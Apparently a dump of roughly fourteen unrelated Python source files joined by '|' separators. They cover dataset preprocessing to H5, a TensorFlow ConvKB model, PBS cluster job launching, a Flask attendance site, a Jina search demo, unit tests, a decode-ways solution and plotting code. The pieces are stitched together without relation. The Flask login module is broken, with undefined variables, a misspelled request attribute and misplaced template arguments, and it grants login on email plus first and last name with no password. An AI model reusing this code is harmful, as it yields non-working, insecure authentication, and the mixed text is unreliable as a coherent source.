print("Finished processing folder {}".format(str(ind)))
print("All done!")
all_data = np.concatenate(all_data)
all_ages = np.concatenate(all_ages)
all_genders = np.concatenate(all_genders)
return all_data, all_ages, all_genders
def split_data_from_dirs(self, data, ages, genders, split):
"""
this function takes in data, labels and % of training data to be used. since % of data for training varies based on
applications we keep that parameter user configurable.
:param data: 4D numpy array of images in (num samples, width, height, channels) format
:param labels: 1D numpy array storing labels for corresponding images
:param split: percentage of data to be used for training
:return: return the splits of training and testing along with labels
"""
print("Number of images in the training data: {}".format(str(data.shape[0])))
print("Ages/Genders: {}".format(str(ages.shape)))
# multiply split percentage with total images length and floor the result. Also cast into int, for slicing array
split_factor = int(np.floor(split * data.shape[0])) # number of images to be kept in training data
print("Using {} images for training and {} images for testing!".format(str(split_factor),
str(data.shape[0] - split_factor)))
x_train = data[:split_factor, :, :, :].astype("float")
x_test = data[split_factor:, :, :, :].astype("float")
y_train_age = ages[:split_factor]
y_test_age = ages[split_factor:]
y_train_gender = genders[:split_factor]
y_test_gender = genders[split_factor:]
print("Training data shape: {}".format(str(x_train.shape)))
print("Testing data shape: {}".format(str(x_test.shape)))
print("Training Age labels shape: {}".format(str(y_train_age.shape)))
print("Testing Age labels shape: {}".format(str(y_test_age.shape)))
print("Training Gender labels shape: {}".format(str(y_train_gender.shape)))
print("Testing Gender labels shape: {}".format(str(y_test_gender.shape)))
return x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender
def generate_h5(self, Xtr, Xtst, ytr_age, ytst_age, ytr_gen, ytst_gen):
print("Generating H5 file...")
hf = h5py.File(self.filename, 'w')
hf.create_dataset('x_train', data=Xtr, compression="gzip")
hf.create_dataset('x_test', data=Xtst, compression="gzip")
hf.create_dataset('y_train_age', data=ytr_age, compression="gzip")
hf.create_dataset('y_test_age', data=ytst_age, compression="gzip")
hf.create_dataset('y_train_gender', data=ytr_gen, compression="gzip")
hf.create_dataset('y_test_gender', data=ytst_gen, compression="gzip")
hf.close()
print("H5 file generated successfully")
def helper(self):
# looping over all the folder text files to aggregate the image paths
all_folders = []
for folder_file in self.folder_files:
folder = self.get_image_paths(folder_file)
all_folders.append(folder)
# print("A sample:", all_folders[0][0])
print("No. of Pics without Age Group Label:", self.none_count)
# total data received after aggregating
data, ages, genders = self.aggregate_data(all_folders)
print("Aggregated data shape: {}".format(str(data.shape)))
print("Aggregated age shape: {}".format(str(ages.shape)))
print("Aggregated genders shape: {}".format(str(genders.shape)))
# splitting data into training and testing based on percentage. split is amount of training data to be used
split = 0.95
x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender = self.split_data_from_dirs(data, ages,
genders,
split)
# encapsulating data into h5 files
self.generate_h5(x_train, x_test, y_train_age, y_test_age, y_train_gender, y_test_gender)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Use this script to process dataset.')
parser.add_argument('-p', '--path', type=str, required=True,
default=os.path.join(os.getenv("HOME"), "data/adience"),
help='Path to raw dataset file to be processed.')
parser.add_argument('-o', '--save', type=str, required=True,
default=os.path.join(os.getenv("HOME"), "data/adience/adience.h5"),
help='Path to save the .h5 file')
args = parser.parse_args()
p = Process(args.path, args.save)
p.helper()
|
from sqlalchemy.dialects.sybase import base, pysybase, pyodbc
from base import CHAR, VARCHAR, TIME, NCHAR, NVARCHAR,\
TEXT,DATE,DATETIME, FLOAT, NUMERIC,\
BIGINT,INT, INTEGER, SMALLINT, BINARY,\
VARBINARY,UNITEXT,UNICHAR,UNIVARCHAR,\
IMAGE,BIT,MONEY,SMALLMONEY,TINYINT
# default dialect
base.dialect = pyodbc.dialect
__all__ = (
'CHAR', 'VARCHAR', 'TIME', 'NCHAR', 'NVARCHAR',
'TEXT','DATE','DATETIME', 'FLOAT', 'NUMERIC',
'BIGINT','INT', 'INTEGER', 'SMALLINT', 'BINARY',
'VARBINARY','UNITEXT','UNICHAR','UNIVARCHAR',
'IMAGE','BIT','MONEY','SMALLMONEY','TINYINT',
'dialect'
)
|
import os
import binascii
# os.urandom()を利用して、秘密鍵をASCII形式で作成してください
secret_key = os.urandom(32)
print(secret_key)
print(binascii.hexlify(secret_key))
# secret_key2 = os.urandom(1)
# print(secret_key2)
# print(binascii.hexlify(b'0'))
# print(int(binascii.hexlify(b'0'),16))
# print(int('bdd03cb27bfd5c61254e693f246a0a2ee9dc66ac698936d5d932fafe6012f1d5',16))
# print(bin(int('bdd03cb27bfd5c61254e693f246a0a2ee9dc66ac698936d5d932fafe6012f1d5',16))) |
import os
import sys
from pbstools import PythonJob
import sys
import getopt
import numpy as np
import glob
import h5py
import time
import glob
import shutil
def main(argv):
opts, args = getopt.getopt(
argv,
[],
[
"output_folder=",
"model_file=",
"start_frame=",
"end_frame=",
"pre_frame=",
"post_frame=",
"nb_jobs=",
"h5_file=",
],
)
for opt, arg in opts:
if opt == "--output_folder":
output_folder = arg
if opt == "--model_file":
model_file = arg
if opt == "--start_frame":
start_frame = int(arg)
if opt == "--end_frame":
end_frame = int(arg)
if opt == "--pre_frame":
pre_frame = int(arg)
if opt == "--post_frame":
post_frame = int(arg)
if opt == "--nb_jobs":
nb_jobs = int(arg)
if opt == "--h5_file":
h5_file = arg
try:
os.mkdir(output_folder)
except:
print("Folder already created")
batch_size = 5
# We infer the movie in chunks
block_size = np.int(np.ceil((end_frame - start_frame) / nb_jobs))
# We force block_size to be a multiple of batch size
block_size = int(np.floor(block_size / batch_size) * batch_size)
jobdir = os.path.join(
output_folder, "tmp_" +
os.path.splitext(os.path.basename(model_file))[0]
)
try:
os.mkdir(jobdir)
except:
print("Folder already created")
files = glob.glob(os.path.join(jobdir, "*"))
for f in files:
os.remove(f)
python_file = "/home/jeromel/Documents/Projects/Deep2P/repos/deepinterpolation/examples/cluster_lib/single_ophys_section_inferrence.py"
list_files_check = []
for index, local_start_frame in enumerate(
np.arange(start_frame, end_frame, block_size)
):
local_path = os.path.join(jobdir, "movie_" + str(index) + ".hdf5")
local_end_frame = np.min(
[end_frame, local_start_frame + block_size - 1])
job_settings = {
"queue": "braintv",
"mem": "180g",
"walltime": "48:00:00",
"ppn": 16,
}
out_file = os.path.join(jobdir, "$PBS_JOBID.out")
list_files_check.append(local_path + ".done")
job_settings.update(
{
"outfile": out_file,
"errfile": os.path.join(jobdir, "$PBS_JOBID.err"),
"email": "[email protected]",
"email_options": "a",
}
)
arg_to_pass = [
"--movie_path "
+ h5_file
+ " --frame_start "
+ str(local_start_frame)
+ " --frame_end "
+ str(local_end_frame)
+ " --output_file "
+ local_path
+ " --model_file "
+ model_file
+ " --batch_size "
+ str(batch_size)
+ " --pre_frame "
+ str(pre_frame)
+ " --post_frame "
+ str(post_frame)
]
PythonJob(
python_file,
python_executable="/allen/programs/braintv/workgroups/nc-ophys/Jeromel/conda/tf20-env/bin/python",
conda_env="/allen/programs/braintv/workgroups/nc-ophys/Jeromel/conda/tf20-env",
jobname="movie_2p",
python_args=arg_to_pass[0],
**job_settings
).run(dryrun=False)
# We wait for the jobs to complete
stay_in_loop = True
while stay_in_loop:
time.sleep(60)
nb_file = 0
for indiv_file in list_files_check:
if os.path.isfile(indiv_file):
nb_file += 1
if nb_file == len(list_files_check):
stay_in_loop = False
# We merge the files
output_merged = os.path.join(
output_folder, "movie_" + os.path.basename(model_file))
list_files = glob.glob(os.path.join(jobdir, "*.hdf5"))
list_files = sorted(
list_files, key=lambda x: int(x.split("movie_")[1].split(".hdf5")[0])
)
nb_frames = 0
for each_file in list_files:
with h5py.File(each_file, "r") as file_handle:
local_shape = file_handle["data"].shape
nb_frames = nb_frames + local_shape[0]
final_shape = list(local_shape)
final_shape[0] = nb_frames
global_index_frame = 0
with h5py.File(output_merged, "w") as file_handle:
dset_out = file_handle.create_dataset(
"data",
shape=final_shape,
chunks=(1, final_shape[1], final_shape[2]),
dtype="float16",
)
for each_file in list_files:
with h5py.File(each_file, "r") as file_handle:
local_shape = file_handle["data"].shape
dset_out[
global_index_frame: global_index_frame + local_shape[0], :, :, :
] = file_handle["data"][:, :, :, :]
global_index_frame += local_shape[0]
shutil.rmtree(jobdir)
if __name__ == "__main__":
main(sys.argv[1:])
|
import tensorflow as tf
import numpy as np
import math
class ConvKB(object):
def __init__(self, sequence_length, num_classes, embedding_size, filter_sizes, num_filters, vocab_size,
pre_trained=[], l2_reg_lambda=0.001, is_trainable=True, useConstantInit=False):
# Placeholders for input, output and dropout
self.input_x = tf.compat.v1.placeholder(
tf.int32, [None, sequence_length], name="input_x")
self.input_y = tf.compat.v1.placeholder(
tf.float32, [None, num_classes], name="input_y")
self.dropout_keep_prob = tf.compat.v1.placeholder(
tf.float32, name="dropout_keep_prob")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.name_scope("embedding"):
if pre_trained == []:
self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -math.sqrt(
1.0/embedding_size), math.sqrt(1.0/embedding_size), seed=1234), name="W")
else:
# trainable=is_trainable)
self.W = tf.Variable(name="W2", initial_value=pre_trained)
self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)
self.embedded_chars_expanded = tf.expand_dims(
self.embedded_chars, -1)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s" % filter_size):
if useConstantInit == False:
filter_shape = [sequence_length,
filter_size, 1, num_filters]
W = tf.Variable(tf.compat.v1.random.truncated_normal(
filter_shape, stddev=0.1, seed=1234), name="W")
else:
init1 = tf.constant([[[[0.1]]], [[[0.1]]], [[[-0.1]]]])
weight_init = tf.tile(
init1, [1, filter_size, 1, num_filters])
W = tf.get_variable(name="W3", initializer=weight_init)
b = tf.Variable(tf.constant(
0.0, shape=[num_filters]), name="b")
conv = tf.nn.conv2d(
self.embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
pooled_outputs.append(h)
# Combine all the pooled features
self.h_pool = tf.concat(pooled_outputs, 2)
total_dims = (embedding_size * len(filter_sizes) -
sum(filter_sizes) + len(filter_sizes)) * num_filters
self.h_pool_flat = tf.reshape(self.h_pool, [-1, total_dims])
# Add dropout
with tf.name_scope("dropout"):
self.h_drop = tf.nn.dropout(
self.h_pool_flat, self.dropout_keep_prob)
# Final (unnormalized) scores and predictions
with tf.name_scope("output"):
W = tf.compat.v1.get_variable(
"W",
shape=[total_dims, num_classes],
initializer=tf.contrib.layers.xavier_initializer(seed=1234))
b = tf.Variable(tf.constant(0.0, shape=[num_classes]), name="b")
l2_loss += tf.nn.l2_loss(W)
l2_loss += tf.nn.l2_loss(b)
self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name="scores")
self.predictions = tf.nn.sigmoid(self.scores)
# Calculate loss
with tf.name_scope("loss"):
losses = tf.nn.softplus(self.scores * self.input_y)
self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=500)
|
import secrets
import datetime
import time
from flask import Flask, render_template, redirect, url_for, request, make_response
from LoginInfo import LoginInfo
import displayManager as dm
import numpy as np
path = "C:/Users/132/Desktop/WebServer/" #Change this if not me
app = Flask(__name__,template_folder= path+"templates")
#(cmd prompt reminder)---
#set FLASK_APP=C:/Users/132/Desktop/WebServer/Main
#flask run
#---
@app.route("/", methods=['GET', 'POST'])
def Login():
global path
if request.method == 'POST':
message = ''
# fileObj = open(path+"Usernames.txt", "r")
#Usernames = fileObj.read().splitlines()
#fileObj.close()
fileObj = open(path+"LoginData.txt", "r")
LoginData = fileObj.read().splitlines()
fileObj.close()
sheet = []
c = 0
while(c<len(LoginData)):
sheet.append(LoginData[c].split(','))
c += 1
#
InfoSheet = np.array(sheet)
#if request.form['Username'] in Usernames:
# UserID = Usernames.index(request.form['Username'])
# if request.form['Password'] == Passwords[UserID]:
# message = 'Login successful. Something should happen now'
## out = render_template('login.html',message = message)
# response = make_response(redirect(url_for('Home')))
# Certificate = LoginInfo.WriteCertificate(path,UserID)
# response.set_cookie('Certificate',Certificate)
# out = response
if(request.form['Email'] in InfoSheet[:,0]):
z = today[:,0].tolist().index(request.form['Email'])
if(request.form['First'] == today[:,1]):
if(request.form['Last'] == today[:,2]):
message = 'Login Succsesful'
response = make_response(redirect(url_for('Home')))
Certificate = LoginInfo.WriteCertificate(path,UserID)
response.set_cookie('Certificate',Certificate)
out = response
else:
message = 'Typo?'
out = render_template('login.html',message = message)
else:
message = 'Typo?'
out = render_template('login.html',message = message)
else:
message = 'Email not recognized.'
out = render_template('login.html',message = message)
else:
message = None
out = render_template('login.html',message = message)
return out
@app.route("/home", methods=['GET', 'POST'])
def Home():
global path
#currently generic. TODO: add more functionality and probably additional pages
Status,UserID = LoginInfo.GetStatus(path) #security
if(Status == "None"):
response = make_response(render_template('Error.html'))
if(Status == "Student"):
message = ""
Info = dm.InfoManager(path)
uTab,UserTime,first,last,IsHere = Info.GetUserData(UserID)
if(request.methos == 'POST'):
now = datetime.datetime.now()
CurrentTime = HumanReadable = now.strftime("%H:%M:%S")
CurrentDate = str(datetime.date.month)+str(datetime.date.day)
if(request.form['CheckIn']):
if(not IsHere):
nothing = Info.AdminOverride(CurrentTime,CurrentDate,UserID,Out = False)
else:
message = "You are already checked in."
elif(request.form['CheckOut']):
if(IsHere):
nothing = Info.AdminOverride(CurrentTime,CurrentDate,UserID,Out = True)
else:
message = "You are not currently checked in, so you may not check out."
response = make_response(render_template('StudentHome.html'),table = uTab,name = str(first)+str(last),message = message)
Certificate = LoginInfo.WriteCertificate(path,UserID) #new certificate
response.set_cookie('Certificate',Certificate)
if(Status == "Admin"):
Info = dm.InfoManager(path)
if(request.method == 'POST'):
response = make_response(redirect(url_for('Home')))
if(request.form['A']):
response.set_cookie('Disp','absent')
if(request.form['P']):
response.set_cookie('Disp','present')
if(request.form['C']):
response.set_cookie('Disp','checked out')
if(request.form['UserSearch']):
response.set_cookie('User',request.form['IDnumber'])
if(request.form['Session']):
response.set_cookie('From',request.form['Session'])
if(request.form['Clear']):
response.set_cookie('Disp','null',max_age = 0)
response.set_cookie('User','null',max_age = 0)
response.set_cookie('From','null',max_age = 0)
Ids = Info.getIds()
c = 0
while(c<len(Ids)):
if(request.form['Edit'+str(Ids[c])]):
response = make_response(redirect(url_for('Home')))
date = request.cookies.get('Session')
checkIn = request.form['CheckIn'+str(Ids[c])]
checkOut = request.form['CheckOut'+str(Ids[c])]
nothing = Info.AdminOverride(checkOut,date,Ids[c],Out = True)
nothing = Info.AdminOverride(checkIn,date,Ids[c],Out = False)
c += 1
else:
if(request.cookies.get('User')):
if(request.cookies.get('User') >= 0):
uTab,UserTime,first,last = Info.GetUserData(request.cookies.get('User'))
response = make_response(render_template('AdminHome.html'),table = uTab,head=str(first)+" "+str(last))
else:
if(request.cookies.get('From')):
Ftab,Atab,Ptab,Ctab,headdate = Info.GetSummary(request.cookies.get('Session'))
else:
Ftab,Atab,Ptab,Ctab,headdate = Info.GetSummary(str(datetime.date.month)+str(datetime.date.day))
if(request.cookies.get('Disp')):
q = request.cookies.get('Disp')
if(q == "absent"):
response = make_response(render_template('AdminHome.html'),table = Atab,head="Absent "+headdate)
elif(q == "present"):
response = make_response(render_template('AdminHome.html'),table = Ptab,head="Currently Present "+headdate)
elif(q == "checked out"):
response = make_response(render_template('AdminHome.html'),table = Ctab,head="Checked Out "+headdate)
elif(q == "user"):
none = Info.GetTotalMatrix()
uTab,UserTime,first,last = Info.GetUserData(request.cookies.get('User'))
response = make_response(render_template('AdminHome.html'),table = Ctab,head=str(first)+" "+str(last))
else:
response = make_response(render_template('AdminHome.html'),table = Ftab,head=headdate)
Certificate = LoginInfo.WriteCertificate(path,UserID) #new certificate
response.set_cookie('Certificate',Certificate)
return response
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import random
import sys
from jina.drivers import BaseDriver
from jina.flow import Flow
class RandomPopRanker(BaseDriver):
max_num_docs = 100
def __call__(self, *args, **kwargs):
for d in self.req.docs:
for k in range(self.req.top_k):
r = d.topk_results.add()
r.match_doc.doc_id = random.randint(0, self.max_num_docs)
r.score.value = random.random()
def config():
os.environ['WORKDIR'] = './workspace'
os.makedirs(os.environ['WORKDIR'], exist_ok=True)
os.environ['JINA_PORT'] = os.environ.get('JINA_PORT', str(45678))
def index():
f = Flow().add(uses='indexer.yml')
with f:
f.index_files(sys.argv[2])
def search():
f = (Flow(rest_api=True, port_expose=int(os.environ['JINA_PORT']))
.add(uses='- !RandomPopRanker {}')
.add(uses='indexer.yml'))
with f:
f.block()
if __name__ == '__main__':
if len(sys.argv) < 2:
print('choose between "index" and "search" mode')
exit(1)
if sys.argv[1] == 'index':
config()
workspace = os.environ['WORKDIR']
if os.path.exists(workspace):
print(f'\n +---------------------------------------------------------------------------------+ \
\n | 🤖🤖🤖 | \
\n | The directory {workspace} already exists. Please remove it before indexing again. | \
\n | 🤖🤖🤖 | \
\n +---------------------------------------------------------------------------------+')
index()
elif sys.argv[1] == 'search':
config()
search()
else:
raise NotImplementedError(f'unsupported mode {sys.argv[1]}')
|
import numpy as np
import pandas as pd
from sklearn import preprocessing, model_selection, svm, neighbors, linear_model, discriminant_analysis, naive_bayes, tree
from utils import general
df = pd.read_csv('iris.data.txt', names=['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'])
df = df.replace({'class': {'Iris-setosa': 3, 'Iris-versicolor': 5, 'Iris-virginica': 7}})
X = np.array(df.drop(['class'], 1))
X = preprocessing.scale(X)
y = np.array(df['class'])
gen = general.General()
gen.fit_score_print(X, y)
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
# prepare models
models = []
models.append(('LR', linear_model.LogisticRegression()))
models.append(('LDA', discriminant_analysis.LinearDiscriminantAnalysis()))
models.append(('KNN', neighbors.KNeighborsClassifier()))
models.append(('CART', tree.DecisionTreeClassifier()))
models.append(('NB', naive_bayes.GaussianNB()))
models.append(('SVM', svm.SVC()))
for name, model in models:
model.fit(X_train, y_train)
accuracy = model.score(X_test, y_test)
print(name, accuracy) |
#!/usr/bin/env python3
# encoding: utf-8
import setuptools
setuptools.setup(
name='reactor_bot',
version='4.5.15',
url='https://github.com/iomintz/reactor-bot',
author='Io Mintz',
author_email='[email protected]',
description='The best dang Discord poll bot around™',
long_description=open('README.rst').read(),
packages=[
'reactor_bot',
'reactor_bot.cogs'],
install_requires=[
'asyncpg',
'bot_bin[sql]>=1.0.1,<2.0.0',
'discord.py>=1.2.3,<2.0.0',
'inflect',
'jishaku'],
python_requires='>=3.6',
extras_require={
'dev': [
'bumpversion'],
'test': [
'pytest',
'pytest-cov',
'freezegun']},
classifiers=[
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'License :: OSI Approved :: MIT License'])
|
# -*- coding: utf-8 -*-
"""Test the layerresponse functions defined in layers.py."""
import unittest
import numpy as np
import smuthi.layers as lay
import smuthi.fields.expansions as fldex
layer_d = [0, 300, 400, 0]
layer_n = [1, 2 + 0.1j, 3, 1 + 5j]
omega = 2 * 3.15 / 550
kpar = omega * 1.7
precision = 15
class TestLayerResponse(unittest.TestCase):
def test_layerresponse_mpmath_equals_numpy(self):
"""Are the results with multiple precision consistent with numpy equivalent?"""
for pol in [0, 1]:
for fromlayer in range(len(layer_d)):
for tolayer in range(len(layer_d)):
lay.set_precision(None)
lmat1 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lay.set_precision(precision)
lmat2 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
np.testing.assert_almost_equal(lmat1, lmat2)
lay.set_precision(None)
def test_scattering_matrix_equals_transfer_matrix(self):
"""Are the results from the transfer matrix algorithm and from the scattering matrix algorithm consistent?"""
for pol in [0, 1]:
tmat = lay.layersystem_transfer_matrix(pol, layer_d, layer_n, kpar, omega)
smat = lay.layersystem_scattering_matrix(pol, layer_d, layer_n, kpar, omega)
np.testing.assert_almost_equal(tmat[1, 0] / tmat[0, 0], smat[1, 0])
def test_layerresponse_against_prototype(self):
"""Are the results from layers.py and consistent with the MATLAB prototype code TSPL?"""
pol = 0
fromlayer = 2
tolayer = 1
lmat = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lmat_TSPL = np.array([[-0.392979481352895 - 0.376963315605839j, -0.455367266697897 + 0.426065579868901j],
[0.545168303416962 - 0.345873455516963j, -0.361796569025878 - 0.644799225334747j]])
np.testing.assert_almost_equal(lmat, lmat_TSPL)
pol = 1
fromlayer = 1
tolayer = 2
lmat = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar, omega, fromlayer, tolayer)
lmat_TSPL = np.array([[-0.240373686730040 - 0.148769054113797j, 0.161922209423045 + 0.222085165907288j],
[-0.182951011363592 + 0.138158890222525j, 0.215395950986834 - 0.057346289106977j]])
np.testing.assert_almost_equal(lmat, lmat_TSPL)
def test_layerresponse_for_kpar_arrays(self):
pol = 1
fromlayer = 2
tolayer = 1
kpar_array = np.linspace(0, kpar)
lmat_vec = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array, omega, fromlayer, tolayer)
lmat_end = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array[-1], omega, fromlayer, tolayer)
lmat0 = lay.layersystem_response_matrix(pol, layer_d, layer_n, kpar_array[0], omega, fromlayer, tolayer)
np.testing.assert_almost_equal(lmat_end, lmat_vec[:, :, -1])
np.testing.assert_almost_equal(lmat0, lmat_vec[:, :, 0])
def test_layerresponse_method(self):
fromlayer=2
tolayer=1
kp = np.linspace(0, 2) * omega
a = np.linspace(0, 2*np.pi)
layer_system = lay.LayerSystem(thicknesses=layer_d, refractive_indices=layer_n)
ref = [0, 0, layer_system.reference_z(fromlayer)]
pwe_up = fldex.PlaneWaveExpansion(k=omega*1.2, k_parallel=kp, azimuthal_angles=a, kind='upgoing',
reference_point=ref)
pwe_up.coefficients[0,:, :] = np.exp(-pwe_up.k_parallel_grid()/omega)
pwe_down = fldex.PlaneWaveExpansion(k=omega * 1.2, k_parallel=kp, azimuthal_angles=a, kind='downgoing',
reference_point=ref)
pwe_down.coefficients[0, :, :] = 2j * np.exp(-pwe_up.k_parallel_grid() / omega * 3)
pwe_r_up, pwe_r_down = layer_system.response(pwe_up, fromlayer, tolayer)
pwe_r_up2, pwe_r_down2 = layer_system.response(pwe_down, fromlayer, tolayer)
pwe_r_up3, pwe_r_down3 = layer_system.response((pwe_up, pwe_down), fromlayer, tolayer)
# print(pwe_r_up.coefficients[0, 0, 0] + pwe_r_up2.coefficients[0, 0, 0])
# print(pwe_r_up3.coefficients[0, 0, 0])
# FIXME: no assert in this test
if __name__ == '__main__':
unittest.main()
|
'''
A message containing letters from A-Z can be encoded into numbers using the following mapping:
'A' -> "1"
'B' -> "2"
...
'Z' -> "26"
To decode an encoded message, all the digits must be grouped then mapped back into letters using the reverse of the mapping above (there may be multiple ways). For example, "11106" can be mapped into:
"AAJF" with the grouping (1 1 10 6)
"KJF" with the grouping (11 10 6)
Note that the grouping (1 11 06) is invalid because "06" cannot be mapped into 'F' since "6" is different from "06".
Given a string s containing only digits, return the number of ways to decode it.
The answer is guaranteed to fit in a 32-bit integer.
Input: s = "5"
Output: 1
Input: s = "12"
Output: 2
Explanation: "12" could be decoded as "AB" (1 2) or "L" (12).
Input: s = "226"
Output: 3
Explanation: "226" could be decoded as "BZ" (2 26), "VF" (22 6), or "BBF" (2 2 6).
Precondition:
n = len(s)
n >= 1
Postcondition:
s stay unchanged
result > 0
C1: n = 1
C2: n = 2
C3: n >= 3
C4: contains 0
Algo:
DP:
Definition: dp[i] = number of combinations with s[:i]
Base Case: dp[0] = 1
dp[1] = 1 if s[0] not 0
RR: dp[i+1] is determined only by dp[i] and dp[i-1]
Result: dp[n]
Runtime: O(n)
Space: O(n)
'''
class Solution:
def numDecodings(self, s: str) -> int:
n = len(s)
dp = [0 for _ in range(n+1)]
dp[0] = 1
dp[1] = 1 if s[0] != '0' else 0
for i in range(1, n):
if s[i] != '0':
dp[i+1] = dp[i]
if s[i-1] == '1':
dp[i+1] = dp[i+1] + dp[i-1]
elif s[i-1] == '2' and int(s[i]) <= 6:
dp[i+1] = dp[i+1] + dp[i-1]
return dp[n]
|
import logging
import imio
import numpy as np
from skimage.segmentation import find_boundaries
def boundaries(registered_atlas, boundaries_out_path):
"""
Generate the boundary image, which is the border between each segmentation
region. Useful for overlaying on the raw image to assess the registration
and segmentation
:param registered_atlas: The registered atlas
:param boundaries_out_path: Path to save the boundary image
"""
atlas_img = imio.load_any(registered_atlas)
boundaries_image = find_boundaries(atlas_img, mode="inner").astype(
np.int8, copy=False
)
logging.debug("Saving segmentation boundary image")
imio.to_tiff(
boundaries_image,
boundaries_out_path,
)
|
import pytest
@pytest.mark.parametrize("route, expected", [
("/youtube/PLdduFHK2eLvfGM7ADIbCgWHFRvu1yBNj0/", "Now, Now - MJ")
])
def test_youtube(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/vimeo/album/3951181/", "Rollercoaster Girl")
])
def test_vimeo(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/custom/youtube:1nvNKi-QT2Q/youtube:YpYSUWrF59A/", "PEN AND PAPER THEME SONG")
])
def test_custom_playlist(client, route, expected):
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/youtube/invalid-playlist/test/", "URL not found"),
("/youtube/invalid-playlist/", "This playlist is either empty, private or non-existing"),
("/vimeo/channel/invalid-channel/", "This album/channel is either empty, private or non-existing")
])
def test_routes_i18n_en(client, route, expected, app):
with app.app_context():
app.config['BABEL_DEFAULT_LOCALE'] = 'en'
response = client.get(route)
assert expected.encode('ascii') in response.data
@pytest.mark.parametrize("route, expected", [
("/youtube/invalid-playlist/test/", "URL nicht gefunden"),
("/youtube/invalid-playlist/", "Diese Playlist ist entweder leer, privat oder existiert nicht"),
("/vimeo/channel/invalid-channel/", "Dieses Album bzw. dieser Channel ist entweder leer, privat oder existiert nicht")
])
def test_routes_i18n_de(client, route, expected, app):
with app.app_context():
app.config['BABEL_DEFAULT_LOCALE'] = 'de'
response = client.get(route)
assert expected.encode('ascii') in response.data
|
import json
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from matplotlib.patches import Rectangle as rectangle
import seaborn as sns
import string
from PIL import Image
import io
import sys
import matplotlib.font_manager as fm
def retrieve_expected_responses_and_hist(expected_NV_model_responses_file_name,
NV_model_hist_file_name):
with open(expected_NV_model_responses_file_name + '.json', 'r') as json_file:
[expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power] = json.load(json_file)
with open(NV_model_hist_file_name + '.json', 'r') as json_file:
NV_model_one_and_two_patient_pop_hist = np.array(json.load(json_file))
return [expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist]
def plot_predicted_statistical_powers_and_NV_model_hists(expected_NV_model_one_RR50_nn_stat_power,
expected_NV_model_two_RR50_nn_stat_power,
expected_NV_model_one_MPC_nn_stat_power,
expected_NV_model_two_MPC_nn_stat_power,
expected_NV_model_one_TTP_nn_stat_power,
expected_NV_model_two_TTP_nn_stat_power,
NV_model_one_and_two_patient_pop_hist,
monthly_mean_min,
monthly_mean_max,
monthly_std_dev_min,
monthly_std_dev_max):
print( '\nNV model one RR50 statistical power: ' + str(np.round(100*expected_NV_model_one_RR50_nn_stat_power, 3)) + ' %' + \
'\nNV model two RR50 statistical power: ' + str(np.round(100*expected_NV_model_two_RR50_nn_stat_power, 3)) + ' %' + \
'\nNV model one MPC statistical power: ' + str(np.round(100*expected_NV_model_one_MPC_nn_stat_power, 3)) + ' %' + \
'\nNV model two MPC statistical power: ' + str(np.round(100*expected_NV_model_two_MPC_nn_stat_power, 3)) + ' %' + \
'\nNV model one TTP statistical power: ' + str(np.round(100*expected_NV_model_one_TTP_nn_stat_power, 3)) + ' %' + \
'\nNV model two TTP statistical power: ' + str(np.round(100*expected_NV_model_two_TTP_nn_stat_power, 3)) + ' %' + '\n' )
monthly_mean_axis_start = monthly_mean_min
monthly_mean_axis_stop = monthly_mean_max - 1
monthly_mean_axis_step = 1
monthly_mean_tick_spacing = 1
monthly_std_dev_axis_start = monthly_std_dev_min
monthly_std_dev_axis_stop = monthly_std_dev_max - 1
monthly_std_dev_axis_step = 1
monthly_std_dev_tick_spacing = 1
monthly_mean_tick_labels = np.arange(monthly_mean_axis_start, monthly_mean_axis_stop + monthly_mean_tick_spacing, monthly_mean_tick_spacing)
monthly_std_dev_tick_labels = np.arange(monthly_std_dev_axis_start, monthly_std_dev_axis_stop + monthly_std_dev_tick_spacing, monthly_std_dev_tick_spacing)
monthly_mean_ticks = monthly_mean_tick_labels/monthly_mean_axis_step + 0.5 - 1
monthly_std_dev_ticks = monthly_std_dev_tick_labels/monthly_std_dev_axis_step + 0.5 - 1
monthly_std_dev_ticks = np.flip(monthly_std_dev_ticks, 0)
